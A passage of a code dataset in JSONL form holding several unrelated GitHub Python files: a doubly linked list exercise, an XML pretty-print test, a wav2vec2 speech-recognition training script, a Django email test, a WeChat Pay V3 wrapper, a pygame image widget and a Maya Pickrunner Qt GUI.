empty')\n\n else:\n # inserting at the beginning of the list\n newnode = Node(nodevalue)\n if location == 0:\n newnode.prev = None\n newnode.next = self.head\n self.head.prev = newnode\n self.head = newnode\n\n # at the end\n elif location == 1:\n newnode.next = None\n newnode.prev = self.tail\n self.tail.next = newnode\n self.tail = 
newnode\n else:\n tempnode = self.head\n index = 0\n while index < location - 1:\n tempnode = tempnode.next\n index += 1\n # note tempnode means curnode\n newnode.next = tempnode.next\n newnode.prev = tempnode\n newnode.next.prev = newnode\n # creating link between our newnode and next node\n tempnode.next = newnode\n\n def travasal(self):\n if self.head is None:\n print('list is empty')\n else:\n curnode = self.head\n while curnode:\n print(curnode.value, end=' ')\n curnode = curnode.next\n\n def backward_travasal(self):\n\n if self.head is None:\n print('list is empty')\n else:\n curnode = self.tail\n while curnode:\n print(curnode.value, end=' ')\n curnode = curnode.prev\n\n def searching(self, nodevalue):\n if self.head is None:\n print('list is empty')\n else:\n curnode = self.head\n while curnode:\n if curnode.value == nodevalue:\n return curnode.value\n curnode = curnode.next\n return ' the value dose not exit in the list.'\n\n def deletion_node(self, location):\n if self.head is None:\n print('list is empty')\n\n else:\n if location == 0:\n # if it's the only node in list\n if self.head == self.tail:\n self.head = None\n self.tail = None\n else:\n # has more than one node in list\n self.head = self.head.next\n self.head.prev = None\n elif location == 1:\n # deletion at the end of list\n if self.head == self.tail:\n self.head = None\n self.tail = None\n else:\n # has more than one node in list\n self.tail = self.tail.prev\n self.tail.next = None\n # deletion at anywhere in the list\n else:\n curnode = self.head\n index = 0\n while index < location - 1:\n curnode = curnode.next\n index += 1\n curnode.next = curnode.next.next\n curnode.next.prev = curnode\n print('the node has been deleted')\n\n def delete(self):\n if self.head is None:\n print('list is empty')\n else:\n\n curnode = self.head\n while curnode:\n curnode.prev = None\n curnode = curnode.next\n self.head = None\n self.tail = None\n print('the DLL has been successfully deleted')\n\n\ndll = doubly_linked()\ndll.creation_doubly(5)\nprint([node.value for node in dll])\ndll.insertion(0, 0)\ndll.insertion(2, 1)\ndll.insertion(6, -3)\ndll.insertion(7, 2)\ndll.insertion(4, 3)\nprint([node.value for node in dll])\ndll.deletion_node(0)\ndll.deletion_node(1)\ndll.deletion_node(2)\ndll.deletion_node(-1)\nprint([node.value for node in dll])\ndll.travasal()\nprint('\\n')\ndll.backward_travasal()\nprint('\\n')\nprint(dll.searching(6))\ndll.delete()\nprint([node.value for node in dll])\n","repo_name":"Kylemercy/pythonProject","sub_path":"linked list/double linked list2.py","file_name":"double linked list2.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"19281423293","text":"from xml.dom.minidom import Document\n\ndef create_pretty_xml():\n # Create a new XML document and an element\n doc = Document()\n root_element = doc.createElement('root')\n doc.appendChild(root_element)\n\n # Add some child elements\n for i in range(3):\n child = doc.createElement('child')\n child.setAttribute('id', str(i))\n root_element.appendChild(child)\n\n # Generate a pretty-printed XML string\n pretty_xml_string = doc.toprettyxml(indent=\" \")\n\n print(doc.encoding)\n\n return pretty_xml_string\n\ndef save_to_file(filename, xml_content):\n # Save the pretty-printed XML to a file\n with open(filename, 'w', encoding='utf-8') as file:\n file.write(xml_content)\n\n# Create pretty XML\npretty_xml = create_pretty_xml()\nprint(pretty_xml)\n\n# Save to 
'test.xml'\nsave_to_file('test.xml', pretty_xml)\n\nprint(\"XML saved to test.xml\")\n","repo_name":"mmatuszk/pyFlashCards","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14081844404","text":"# -*- coding: utf-8 -*-\n# test comment\nimport argparse\nimport os\nimport sys\nimport time\n\nimport random\nimport math\nimport numpy as np\n\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\n\nfrom tqdm import tqdm\nimport datasets_wav2vec2\nimport torch.multiprocessing as mp\nimport torch.nn.functional as F\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom torch.utils.data import DataLoader\nimport torch.distributed as dist\n\nfrom utils import hparams as hp\nfrom utils.utils import log_config, fill_variables, adjust_learning_rate, load_model, create_masks, init_weight\nfrom Models.transformer_wav2vec2 import TransformerWav2vec2\n\nrandom.seed(77)\ntorch.random.manual_seed(777)\ntorch.cuda.manual_seed_all(777)\nnp.random.seed(777)\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef get_learning_rate(step, hp):\n warmup_step = hp.warmup_step #hp.warmup_step # 4000\n warmup_factor = hp.warmup_factor #hp.warmup_factor #10.0 # 1.0\n d_model = 256\n return warmup_factor * min(step ** -0.5, step * warmup_step ** -1.5) * (d_model ** -0.5)\n\ndef get_learning_rate_tristage(step):\n max_update = 80000\n phase_ratio = [0.1, 0.4, 0.5]\n final_lr_scale = 0.05\n init_lr_scale = 0.01\n\n peak_lr = 0.00003\n init_lr = init_lr_scale * peak_lr\n final_lr = final_lr_scale * peak_lr\n \n warmup_steps = int(max_update * phase_ratio[0])\n hold_steps = int(max_update * phase_ratio[1])\n decay_steps = int(max_update * phase_ratio[2])\n\n warmup_rate = (peak_lr - init_lr) / warmup_steps\n decay_factor = -math.log(final_lr_scale) / decay_steps\n\n # stage 0\n if step < warmup_steps:\n lr = init_lr + warmup_rate * step\n return lr\n \n offset = warmup_steps\n # stage 1\n if step < offset + hold_steps:\n lr = peak_lr\n return lr\n\n offset += hold_steps\n # stage 2\n if step <= offset + decay_steps:\n lr = peak_lr * math.exp(-decay_factor * step)\n return lr\n\n # stage 3\n return final_lr\n\ndef train_loop(model, optimizer, step, epoch, args, hp, rank, dataloader):\n scaler = torch.cuda.amp.GradScaler()\n src_pad = 0\n trg_pad = 0\n\n train_len = len(dataloader)\n local_time = time.time()\n device = f'cuda:{rank}'\n label_smoothing = True\n if hp.optimizer_type == 'Noam':\n if epoch >= hp.decay_epoch:\n lr = adjust_learning_rate(optimizer, epoch, hp.decay_epoch)\n else:\n if hp.lr_tristage:\n lr = get_learning_rate_tristage(step // hp.accum_grad + 1)\n else:\n lr = get_learning_rate(step//hp.accum_grad+1, hp)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n optimizer.zero_grad()\n for d in dataloader:\n text, wav_input, pos_text, pos_wav2vec2, text_lengths, wav2vec2_lengths = d\n\n text = text.to(device, non_blocking=True)\n wav_input = wav_input.to(device, non_blocking=True)\n pos_text = pos_text.to(device, non_blocking=True)\n pos_wav2vec2 = pos_wav2vec2.to(device, non_blocking=True)\n text_lengths = text_lengths.to(device, non_blocking=True)\n \n batch_size = wav_input.shape[0]\n \n if hp.decoder == 'LSTM':\n text_input = text\n src_mask, trg_mask = create_masks(pos_wav2vec2, pos_text)\n else:\n text_input = text[:, :-1]\n src_mask, trg_mask = create_masks(pos_wav2vec2, pos_text[:, 
:-1])\n\n with torch.cuda.amp.autocast(hp.amp): #and torch.autograd.set_detect_anomaly(True):\n if args.n_gpus > 1:\n dist.barrier()\n youtputs, ctc_outputs, attn_dec_dec, attn_dec_enc = model(wav_input, text_input, src_mask, trg_mask, step//hp.accum_grad+1)\n\n print('step {} {}'.format(step, train_len))\n print('batch size = {}'.format(batch_size))\n print('lr = {}'.format(lr))\n step += 1\n if hp.decoder != 'ctc':\n loss_att = 0.0\n # cross entropy\n if label_smoothing:\n if hp.decoder == 'LSTM':\n ys = text.contiguous().view(-1, 1)\n else:\n ys = text[:, 1:].contiguous().view(-1, 1)\n B, T, L = youtputs.shape\n #eps = 0.1\n log_prob = F.log_softmax(youtputs, dim=2)\n onehot = torch.zeros((B * T, L), dtype=torch.float).to(DEVICE).scatter_(1, ys, 1)\n onehot = onehot * (1 - 0.1) + (1 - onehot) * 0.1 / (youtputs.size(2) - 1)\n onehot = onehot.reshape(B, T, L)\n for i, t in enumerate(text_lengths):\n if hp.decoder == 'LSTM':\n len_t = t\n else:\n len_t = t - 1\n if hp.T_norm:\n loss_att += -(onehot[i, :len_t, :] * log_prob[i, :len_t, :]).sum() / len_t\n else:\n loss_att += -(onehot[i, :len_t, :] * log_prob[i, :len_t, :]).sum()\n loss_att /= batch_size\n else:\n ys = text[:, 1:].contiguous().view(-1)\n loss_att = F.cross_entropy(youtputs.view(-1, youtputs.size(-1)), ys, ignore_index=trg_pad)\n print(f'loss_att = {loss_att.item()}')\n\n\n if hp.decoder == 'ctc':\n predict_ts_ctc = F.log_softmax(ctc_outputs, dim=2).transpose(0, 1)\n loss_ctc = F.ctc_loss(predict_ts_ctc, text, wav2vec2_lengths, text_lengths, blank=0)\n print('loss_ctc = {}'.format(loss_ctc.item()))\n loss = loss_ctc\n elif hp.use_ctc:\n ## NOTE: ctc loss does not support fp16?\n predict_ts_ctc = F.log_softmax(ctc_outputs, dim=2).transpose(0, 1)\n loss_ctc = F.ctc_loss(predict_ts_ctc, text, wav2vec2_lengths, text_lengths, blank=0)\n print('loss_ctc = {}'.format(loss_ctc.item()))\n loss = (hp.mlt_weight * loss_att + (1 - hp.mlt_weight) * loss_ctc)\n else: \n loss = loss_att\n print('loss =', loss.item())\n if not torch.isnan(loss):\n if hp.amp:\n loss /= hp.accum_grad\n scaler.scale(loss).backward()\n if step % hp.accum_grad == 0:\n if hp.clip is not None:\n scaler.unscale_(optimizer)\n torch.nn.utils.clip_grad_norm_(model.parameters(), hp.clip)\n scaler.step(optimizer)\n scaler.update()\n else:\n loss /= hp.accum_grad\n loss.backward()\n if step % hp.accum_grad == 0:\n optimizer.step()\n\n if step % hp.accum_grad == 0 and hp.optimizer_type == 'Noam':\n if epoch < hp.decay_epoch:\n if hp.lr_tristage:\n lr = get_learning_rate_tristage(step // hp.accum_grad + 1)\n else:\n lr = get_learning_rate(step // hp.accum_grad + 1, hp)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n else:\n print('loss is nan')\n del loss\n sys.exit(1)\n if step % hp.accum_grad == 0 and hp.optimizer_type == 'Noam':\n optimizer.zero_grad()\n sys.stdout.flush()\n # calc\n #n_correct = 0\n #for i, t in enumerate(text_lengths):\n # tmp = youtputs[i, :t-1, :].max(1)[1].cpu().numpy()\n # for j in range(t-1):\n # if tmp[j] == text[i][j+1]:\n # n_correct = n_correct + 1\n #acc = 1.0 * n_correct / float(sum(text_lengths))\n #print('acc = {}'.format(acc))\n if rank == 0 and ((epoch+1) % hp.save_per_epoch >= (hp.save_per_epoch - 10) or (epoch+1) % hp.save_per_epoch == 0):\n torch.save(model.state_dict(), hp.save_dir+\"/network.epoch{}\".format(epoch+1))\n print('save model')\n \n if rank == 0 and (epoch + 1) % hp.save_per_epoch == 0:\n torch.save(optimizer.state_dict(), hp.save_dir+\"/network.optimizer.epoch{}\".format(epoch+1))\n print('save 
optimizer')\n\n #if args.n_gpus > 1:\n # dist.barrier()\n return step\n\n\ndef get_dataloader(step, args, hp):\n ## TODO: Mask setting\n if step // hp.accum_grad > hp.warmup_step:\n train_dataset = datasets_wav2vec2.TrainDatasets(hp.train_script, hp)\n else:\n train_dataset = datasets_wav2vec2.TrainDatasets(hp.train_script, hp)\n\n collate_fn_transformer = datasets_wav2vec2.collate_fn\n if hp.batch_size is not None:\n sampler = datasets_wav2vec2.NumBatchSampler(train_dataset, hp.batch_size)\n elif hp.max_seqlen is not None:\n sampler = datasets_wav2vec2.LengthsBatchSampler(train_dataset, hp.max_seqlen, hp.lengths_file, shuffle=True, shuffle_one_time=False, shuffle_all=hp.dataset_shuffle_all)\n\n train_sampler = datasets_wav2vec2.DistributedSamplerWrapper(sampler) if args.n_gpus > 1 else sampler\n dataloader = DataLoader(train_dataset, batch_sampler=train_sampler, num_workers=8, collate_fn=collate_fn_transformer)\n\n return dataloader\n\n\ndef train_epoch(model, optimizer, args, hp, step, start_epoch=0, rank=0):\n dataloader = get_dataloader(step, args, hp)\n\n for epoch in range(start_epoch, hp.max_epoch):\n start_time = time.time()\n if step // hp.accum_grad > hp.warmup_step:\n dataloader = get_dataloader(step, args, hp)\n\n step = train_loop(model, optimizer, step, epoch, args, hp, rank, dataloader)\n \n print(\"EPOCH {} end\".format(epoch+1))\n print('elapsed time = {}'.format(time.time() - start_time))\n\n\ndef init_distributed(rank, n_gpus, port):\n assert torch.cuda.is_available(), \"Distributed mode requires CUDA.\"\n\n torch.cuda.set_device(rank % n_gpus)\n\n os.environ['MASTER_ADDR'] = 'localhost' #dist_config.MASTER_ADDR\n os.environ['MASTER_PORT'] = port #dist_config.MASTER_PORT\n\n torch.distributed.init_process_group(\n backend='nccl', world_size=n_gpus, rank=rank\n )\n\n\ndef cleanup():\n torch.distributed.destroy_process_group()\n\n\ndef run_distributed(fn, args, hp):\n port = '60' + str(int(time.time()))[-4:]\n print(f'port = {port}')\n try:\n mp.spawn(fn, args=(args, hp, port), nprocs=args.n_gpus, join=True)\n except:\n cleanup()\n\ndef run_training(rank, args, hp, port=None):\n if args.n_gpus > 1:\n init_distributed(rank, args.n_gpus, port)\n torch.cuda.set_device(f'cuda:{rank}')\n\n ## NOTE: variable\n model = TransformerWav2vec2(hp, pretrain_model='facebook/wav2vec2-large-lv60', freeze_feature_extractor=hp.freeze_feature_extractor)\n ## TODO: change init_weight (maybe initialize all networks)\n #model.apply(init_weight)\n model.train()\n\n if rank == 0:\n print(model)\n\n model = model.to(rank)\n\n if args.n_gpus > 1:\n model = DDP(torch.nn.SyncBatchNorm.convert_sync_batchnorm(model), device_ids=[rank])\n \n max_lr = hp.init_lr\n if hp.optimizer_type == 'Noam':\n ## NOTE: scheduling?\n ## NOTE: learning rate?\n optimizer = torch.optim.Adam(model.parameters(), lr=max_lr, betas=(0.9, 0.98), eps=1e-9)\n else:\n optimizer = torch.optim.Adam(model.parameters(), lr=max_lr)\n \n assert (hp.batch_size is None) != (hp.max_seqlen is None)\n\n if args.n_gpus > 1:\n dist.barrier()\n # configure map_location properly\n map_location = {'cuda:%d' % 0: 'cuda:%d' % rank}\n\n if hp.loaded_epoch is not None:\n start_epoch = hp.loaded_epoch\n load_dir = hp.loaded_dir\n print('epoch {} loaded'.format(hp.loaded_epoch))\n loaded_dict = load_model(\"{}\".format(os.path.join(load_dir, 'network.epoch{}'.format(hp.loaded_epoch))), map_location=map_location)\n model.load_state_dict(loaded_dict)\n if hp.is_flat_start:\n step = 1\n start_epoch = 0\n print('flat_start')\n else:\n loaded_dict = 
torch.load(\"{}\".format(os.path.join(load_dir, 'network.optimizer.epoch{}'.format(hp.loaded_epoch))), map_location=map_location)\n optimizer.load_state_dict(loaded_dict)\n step = loaded_dict['state'][0]['step']\n #lr = get_learning_rate(step//hp.accum_grad+1, hp)\n lr = get_learning_rate_tristage(step // hp.accum_grad + 1)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n del loaded_dict\n torch.cuda.empty_cache()\n else:\n start_epoch = 0\n step = 1\n \n pytorch_total_params = sum(p.numel() for p in model.parameters())\n print('params = {0:.2f}M'.format(pytorch_total_params / 1000 / 1000))\n train_epoch(model, optimizer, args, hp, step=step, start_epoch=start_epoch, rank=rank)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--hp_file', type=str, default='hparams.py')\n args = parser.parse_args()\n hp.configure(args.hp_file)\n fill_variables(hp)\n log_config(hp)\n\n os.makedirs(hp.save_dir, exist_ok=True)\n\n n_gpus = torch.cuda.device_count()\n args.__setattr__('n_gpus', n_gpus)\n\n if n_gpus > 1:\n run_distributed(run_training, args, hp)\n else:\n run_training(0, args, hp, None)\n\nif __name__ == '__main__':\n main()\n","repo_name":"syoamakase/Transformer_ASR","sub_path":"train_wav2vec2.py","file_name":"train_wav2vec2.py","file_ext":"py","file_size_in_byte":13463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19818393111","text":"# python 3.6\n# -*- coding: utf-8 -*-\n# @Time : 2020-01-26 20:51\n# @Author : 乐天派逗逗\n# @Site : Windows 10\n# @File : send_mail.py\n# @Software: PyCharm\n# @Contact : 1584838420@qq.com\n# @Features: 邮件发送系统\n\nimport os\nfrom django.core.mail import send_mail\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'MyRegist.settings' # 必须添加 , 依赖于 Django\n\nif __name__ == '__main__':\n\n res = send_mail(\n '来自www.liujiangblog.com的测试邮件',\n '欢迎访问www.cnblogs.com/shiwei1930,这里是SUOSUO博客站点,本站专注于Python、Django技术的分享!',\n '1584838420@qq.com',\n ['1584838420@qq.com'], # target email@aliyun.com\n )\n print('res=', res) # 成功 返回 1\n\n# 对于send_mail方法,\n# 第一个参数是邮件主题subject;\n# 第二个参数是邮件具体内容;\n# 第三个参数是邮件发送方,\n# 第四个参数是接受方的邮件地址列表, 需要和你settings中的一致;\n\n","repo_name":"GabrielGuo/MyRegist","sub_path":"MyRegist/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2475965797","text":"from __future__ import absolute_import, unicode_literals\n\nfrom .core import Core\nfrom .sign_manager import SignManager\nfrom .cert_manager import CertManager\nfrom .encrypt_manager import EncryptManager\n\n\nclass WechatPayV3(Core, SignManager, CertManager, EncryptManager):\n _merchant_id = None\n _app_id = None # place a order, pay\n _serial_number = None # request header, place a order.\n _private_key_path = None # sign, request header, sensitive_field_decrypt\n _public_key_path = None # verify, sensitive_field_encrypt\n _api_v3_key = None # decrypt received notification data\n\n def __init__(self, merchant_id,\n app_id=None,\n api_v3_key=None,\n serial_number=None,\n private_key_path=None,\n public_key_path=None,\n ):\n self._merchant_id = merchant_id\n self._app_id = app_id\n self._serial_number = serial_number\n self._private_key_path = private_key_path\n self._public_key_path = public_key_path\n self._api_v3_key = api_v3_key\n\n __private_key = None\n\n @property\n def _private_key(self):\n return self.__private_key or 
self.load_private_key(self._private_key_path)\n\n __public_key = None\n\n @property\n def _public_key(self):\n return self.__public_key or self.load_public_key(self._public_key_path)\n\n\nclass WPV3PreRequest(WechatPayV3):\n def __init__(self, merchant_id, app_id, serial_number, private_key_path):\n super(WPV3PreRequest, self).__init__(\n merchant_id,\n app_id=app_id,\n serial_number=serial_number,\n private_key_path=private_key_path,\n )\n\n\nclass WPV3PaySign(WechatPayV3):\n def __init__(self, merchant_id, app_id, private_key_path):\n super(WPV3PaySign, self).__init__(\n merchant_id,\n app_id=app_id,\n private_key_path=private_key_path,\n )\n\n\nclass WPV3Verify(WechatPayV3):\n def __init__(self, merchant_id, public_key_path):\n super(WPV3Verify, self).__init__(\n merchant_id,\n public_key_path=public_key_path,\n )\n\n\nclass WPV3Decrypt(WechatPayV3):\n def __init__(self, merchant_id, api_v3_key):\n super(WPV3Decrypt, self).__init__(\n merchant_id,\n api_v3_key=api_v3_key,\n )\n","repo_name":"vericant/wechat_pay","sub_path":"wechat_pay_v3/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"72930768769","text":"import csv\n\nprint(\"Enter path to csv file you want to create/ edit\")\npath = input()\n\nwith open(path, 'w') as csvfile:\n fieldnames = ['nr', 'squared']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for index in range(0, 10):\n writer.writerow({'nr': index, 'squared': index*index})","repo_name":"dasMalle/AScriptADay2016","sub_path":"January/07-CSVFiles/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"549460341","text":"import pygame\nfrom pygame import mixer\n\npygame.init()\nmixer.init()\n\n\nclass Image:\n def __init__(self, screen, path, size, default_tap=True):\n self.screen = screen\n self.path = path\n self.size = size\n self.default_tap = default_tap\n self.y = self.size.y\n\n self.image = pygame.image.load(path)\n\n self.image = pygame.transform.scale(self.image, (size.width, size.height))\n \n\n def draw(self):\n self.screen.blit(self.image, (self.size.x, self.size.y))\n \n def onTap(self, event):\n if self.default_tap:\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.size.rect.collidepoint(event.pos):\n self.size.y += 3\n if event.type == pygame.MOUSEBUTTONUP:\n self.size.y = self.y\n if self.size.rect.collidepoint(event.pos):\n click = mixer.Sound('assets/sounds/click.mp3')\n mixer.Sound.set_volume(click, 1)\n mixer.Sound.play(click)\n return True\n if event.type == pygame.MOUSEBUTTONUP:\n if self.size.rect.collidepoint(event.pos):\n return True\n\n","repo_name":"omidziveh/pychess","sub_path":"widgets/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"21355171276","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''The Pickrunner base interface.\n\nThis module contains an abstract controller that is used to implement different\nDCC environments, such as Maya, and a GUI that the controller can be used for.\n\n'''\n\n# IMPORT STANDARD LIBRARIES\nimport abc\nimport textwrap\n\n# IMPORT THIRD-PARTY LIBRARIES\nfrom Qt import QtWidgets\n\n# IMPORT LOCAL LIBRARIES\nfrom . 
import visibility_widget\n\n\nclass DirectionPad(QtWidgets.QWidget):\n\n '''A widget that shows buttons in a grid for up/down/left/right.\n\n Like the name implies, this widget lays out its default directions like a \"+\"\n sign, with \"main_widget\" in the middle.\n\n By default this widget doesn't do anything. It's meant to be added to other\n widgets and have functions connected to its buttons.\n\n '''\n\n def __init__(self, parent=None):\n '''Create the default children for this widget.\n\n Args:\n parent (:obj:`<QtCore.QObject>`, optional):\n Qt-based associated object. Default is None.\n\n '''\n super(DirectionPad, self).__init__(parent=parent)\n self.directions = dict()\n\n self.setLayout(QtWidgets.QVBoxLayout())\n self.main_widget = QtWidgets.QPushButton('Load selection')\n self.direction_layout = QtWidgets.QGridLayout()\n\n left_button = QtWidgets.QPushButton('Left')\n right_button = QtWidgets.QPushButton('Right')\n up_button = QtWidgets.QPushButton('Up')\n down_button = QtWidgets.QPushButton('Down')\n\n widgets = [\n ('center', self.main_widget),\n ('left', left_button),\n ('right', right_button),\n ('up', up_button),\n ('down', down_button),\n ]\n\n for storage_name, widget in widgets:\n self.directions[storage_name] = widget\n widget.setObjectName(storage_name)\n\n self.direction_layout.addWidget(up_button, 0, 1)\n self.direction_layout.addWidget(left_button, 1, 0)\n self.direction_layout.addWidget(self.main_widget, 1, 1)\n self.direction_layout.addWidget(right_button, 1, 2)\n self.direction_layout.addWidget(down_button, 2, 1)\n\n self.layout().addLayout(self.direction_layout)\n\n self.main_widget.setObjectName('load_selection_widget')\n\n\nclass BehaviorControl(object):\n\n '''An abstract controller that must be implemented in subclasses.\n\n This controller is used to interface with Pickrunner.\n\n '''\n\n def __init__(self):\n '''Initialize the object and do nothing else.'''\n super(BehaviorControl, self).__init__()\n\n @staticmethod\n @abc.abstractmethod\n def get_selection(cls):\n '''list: The selected objects in the Maya scene.'''\n return []\n\n @classmethod\n @abc.abstractmethod\n def get_settings(cls, obj):\n '''dict: Any information stored in the given object that can be used.'''\n return dict()\n\n @staticmethod\n @abc.abstractmethod\n def get_object_name(cls, obj):\n '''str: Find the unique-name of the given object.'''\n return ''\n\n @classmethod\n @abc.abstractmethod\n def assign(cls, from_object, direction, to_object, settings=None):\n '''Set an object to be remapped to another object, given some direction.\n\n Args:\n from_object:\n The object that will have the direction and to_object stored onto.\n direction:\n Some unique key to store onto from_object. This direction should\n always point towards to_object. 
(How direction points to\n to_object is up to the developer to implement).\n to_object:\n The object to remap to when direction and from_object are given\n to :func:`BehaviorControl.do_motion`.\n\n '''\n pass\n\n @classmethod\n @abc.abstractmethod\n def do_motion(cls, direction, obj):\n '''Move the object to a given direction.\n\n How exactly it should \"move\" must be implemented in subclasses.\n For example, in Maya, this method will select a node that is associated\n with the given node-direction pair.\n\n Args:\n direction: The direction to move to.\n obj: The object to move from.\n\n '''\n pass\n\n\nclass AssignmentManagerWidget(QtWidgets.QWidget):\n\n '''A Qt widget used to pair objects together.\n\n For example, in Maya, this widget is used as a GUI to implement\n a special-pickwalk function.\n\n '''\n\n selection_mode_label = 'Selection Mode'\n assignment_mode_label = 'Assignment Mode'\n mode_options = (selection_mode_label, assignment_mode_label)\n\n def __init__(self, controller, parent=None):\n '''Create the base window and its child widgets.\n\n By default, when the GUI loads, it is set to selection mode.\n\n Args:\n controller (BehaviorControl):\n A environment controller. Basically, any function that is unique\n to a particular DCC like \"get_selection\", \"set_info\" is put here.\n parent (:obj:`<QtCore.QObject>`, optional):\n Qt-based associated object. Default is None.\n\n Raises:\n RuntimeError: If the up-arrow button doesn't exist.\n\n '''\n super(AssignmentManagerWidget, self).__init__(parent=parent)\n self.controller = controller\n self.loaded_object = None\n self._current_mode = self.selection_mode_label\n\n self.setLayout(QtWidgets.QVBoxLayout())\n\n self.autopair_check_box = QtWidgets.QCheckBox('Auto-Pair')\n self.mode_button = QtWidgets.QPushButton(self.selection_mode_label)\n self.loaded_object_widget = QtWidgets.QLineEdit()\n self.loaded_object_label = QtWidgets.QLabel('Loaded object:')\n\n self.manager = DirectionPad()\n self.assignment_info_widget = visibility_widget.ExpandCollapseWidget('Assignment Info')\n\n self.layout().addWidget(self.mode_button)\n self.layout().addStretch(1)\n self.load_widget = QtWidgets.QWidget()\n self.load_widget.setLayout(QtWidgets.QHBoxLayout())\n self.load_widget.layout().addWidget(self.loaded_object_label)\n self.load_widget.layout().addWidget(self.loaded_object_widget)\n self.layout().addWidget(self.load_widget)\n self.layout().addWidget(self.manager)\n self.layout().addWidget(self.assignment_info_widget)\n\n # Put the \"Auto-Pair\" checkbox widget next to the up-direction button\n index = self.manager.direction_layout.indexOf(self.manager.directions['up'])\n if index == -1:\n raise RuntimeError('No up arrow widget could be found')\n\n row, column, _, _ = self.manager.direction_layout.getItemPosition(index)\n self.manager.direction_layout.addWidget(self.autopair_check_box, row, column + 1)\n\n self.init_default_settings()\n self.init_interactive_settings()\n\n def init_default_settings(self):\n '''Update this widget to make sure its default display matches its input.\n\n Also set toolTips, objectNames, and other information of widgets.\n\n '''\n self.loaded_object_widget.setReadOnly(True)\n self.autopair_check_box.setChecked(True)\n self.update_appearance()\n\n self.setMinimumHeight(270)\n\n self.autopair_check_box.setToolTip(\n 'If disabled, connects are only 1-way. 
But if enabled, connecting an '\n 'objects will be connected 2-ways, by default.')\n\n load_tooltip = 'Select an object and then click load selection to load it'\n self.loaded_object_widget.setToolTip(load_tooltip)\n self.manager.main_widget.setToolTip(load_tooltip)\n self.loaded_object_label.setToolTip(load_tooltip)\n\n self.mode_button.setToolTip(textwrap.dedent(\n '''\n Click to change Pickrunner's modes\n\n Assignment mode lets you edit object-direction relationships like\n clicking left on \"objectA\" will move to \"objectB\".\n\n Selection mode will actually change your selection from \"objectA\"\n to \"objectB\" when you click the left button, assuming you've created\n this relationship in advance.\n\n '''))\n self.mode_button.setStyleSheet(\n '''\n QPushButton[mode=selection] {\n background-color: rgb(65, 130, 130);\n }\n QPushButton[mode=assignment] {\n background-color: rgb(178, 75, 255);\n }\n '''\n )\n self.mode_button.setProperty('mode', 'selection')\n\n self.setStyleSheet(\n '''\n QPushButton[status=\"okay\"] {\n background-color: rgb(0, 120, 0);\n }\n\n QPushButton[status=\"not_okay\"] {\n background-color: rgb(200, 200, 0);\n color: black;\n }\n '''\n )\n self.mode_button.setObjectName('mode_button')\n self.manager.setObjectName('manager_widget')\n self.assignment_info_widget.setObjectName('info_widget')\n\n def init_interactive_settings(self):\n '''Create all of the button load/selection functionality of this GUI.'''\n def load_selection():\n '''Load the selection into our GUI and update its appearance.'''\n try:\n obj = self.controller.get_selection()[-1]\n except IndexError:\n obj = None\n\n self.set_loaded_object(obj)\n\n self.manager.main_widget.clicked.connect(load_selection)\n self.mode_button.clicked.connect(self.toggle_mode)\n\n for widget in self.manager.directions.values():\n if self.is_load_selection_widget(widget):\n continue\n\n widget.clicked.connect(self.do_action)\n\n def _make_info_line_widget(self, label, obj):\n '''Create a widget that will display the direction and object info.'''\n container = QtWidgets.QWidget()\n container.setLayout(QtWidgets.QHBoxLayout())\n\n obj_widget = QtWidgets.QLineEdit()\n obj_widget.setText(self.controller.get_object_name(obj))\n obj_widget.setReadOnly(True)\n\n container.layout().addWidget(QtWidgets.QLabel(label))\n container.layout().addWidget(obj_widget)\n\n return container\n\n def is_load_selection_widget(self, widget):\n '''bool: If the given widget is the \"Load Selection\" widget.'''\n if widget == self.manager.main_widget.objectName():\n return True\n\n return widget == self.manager.main_widget\n\n def is_pairing_enabled(self):\n '''bool: If the user wants to make assignments reflective.'''\n return self.autopair_check_box.isChecked()\n\n def has_loaded_object(self):\n '''bool: If this widget has an associated object.'''\n return self.loaded_object is not None\n\n def set_loaded_object(self, obj):\n '''Change the loaded object to the given object.'''\n self.loaded_object = obj\n self.update_appearance()\n\n def set_mode(self, mode):\n '''Set the current mode of this GUI to the given mode.\n\n Raises:\n ValueError:\n If the given mode wasn't one of the expected modes.\n This method expects a mode that's defined in \"mode_options\".\n\n '''\n if mode not in self.mode_options:\n raise ValueError('Mode: \"{mode}\" was invalid. 
